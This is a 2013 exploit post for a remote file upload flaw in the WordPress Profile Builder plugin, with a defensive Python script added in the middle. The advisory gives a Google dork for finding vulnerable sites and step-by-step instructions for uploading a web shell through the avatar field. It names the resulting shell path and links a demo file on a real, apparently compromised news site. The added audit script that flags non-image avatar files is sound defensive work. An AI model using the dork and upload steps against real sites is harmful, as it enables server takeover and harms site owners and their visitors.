
Profile Builder Remote File Upload

Author: xMjahd, Published: 17-05-2013
###########################################################################
[~] Exploit Title: Profile Builder Remote File Upload
[~] Date: 02-05-2013
[~] Author: xMjahd
[~] Contact: xMjahd[at]gmail[dot]com
[~] Vendor Homepage: http://www.cozmoslabs.com/wordpress-profile-builder/
[~] Category: webapps/php
[~] Version: Requires at least: 3.1/Tested up to: 3.5/Stable tag: 1.3.4
[~] Tested on: Windows
###########################################################################

# Information
This plugin is built to let users register on the blog and edit their profiles.
Most of the affected sites are press, news and geek sites ...

# Exploit
1 - Google Dork: "wp-content/uploads/profile_builder/"
2 - http://server/[path]/wp-login.php?action=register
3 - http://server/[path]/wp-login.php?action=login
4 - http://server/[path]/wp-admin/profile.php
Edit your profile avatar: a shell can be uploaded in place of the avatar using Tamper Data / Live HTTP Headers,
and the shell will be uploaded to this location:
http://server/[path]/wp-content/uploads/profile_builder/avatars/shell.
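
A defender-side check for the upload location named above, as an added example (not part of the original advisory or the plugin's code): it audits an avatars directory for files that are not plain images. The allowlist, the marker lists and the function names are assumptions, and the sample files are constructed.

```python
import os
import tempfile

# Assumption: legitimate avatars are only ever JPEG, PNG or GIF.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
SCRIPT_EXTS = {"php", "phtml", "php5", "phar"}      # assumed list, extend as needed
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")     # assumed list, extend as needed

def audit_avatar_dir(avatar_dir):
    """Return {relative_path: [reasons]} for files that are not plain images."""
    findings = {}
    for root, _dirs, files in os.walk(avatar_dir):
        for name in sorted(files):
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                data = fh.read()
            reasons = []
            # Look at every dot-separated suffix so "a.php.jpg" is caught too.
            parts = name.lower().split(".")[1:]
            final_ext = "." + parts[-1] if parts else ""
            if final_ext not in IMAGE_MAGIC:
                reasons.append("extension not in image allowlist")
            elif not data.startswith(IMAGE_MAGIC[final_ext]):
                reasons.append("content does not match extension")
            if any(p in SCRIPT_EXTS for p in parts[:-1]):
                reasons.append("script extension before final suffix")
            if any(m in data.lower() for m in SCRIPT_MARKERS):
                reasons.append("script marker in content")
            if reasons:
                findings[os.path.relpath(path, avatar_dir)] = reasons
    return findings

def build_sample_dir():
    """Constructed sample data: one clean PNG header and three suspicious files."""
    d = tempfile.mkdtemp()
    samples = {
        "userID_1_originalAvatar_photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "userID_2_originalAvatar_note.txt": b"hello",
        "userID_3_originalAvatar_pic.php.jpg": b"\xff\xd8\xff\xe0JFIF",
        "userID_4_originalAvatar_img.gif": b"GIF89a<?php /* constructed */ ?>",
    }
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(data)
    return d
```

Run `audit_avatar_dir()` against the site's own `wp-content/uploads/profile_builder/avatars/` directory; any finding there is a file the avatar feature should never have stored.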

# Demos
http://aljubailtoday.com.sa/wp-content/uploads/profile_builder/avatars/userID_136_originalAvatar_xMjahd.txt
Greets to iPunish, xLine, Mr-H4rd3n, Federal, Sql_M4ster, Zombi3_Ma, Mauritanian Attacker, Dr-Spam,
Mr-Benladen, V!ru$ No!r, Azar36.exe, syS Anti
[~] Made in Morocco ;p Santacruz .
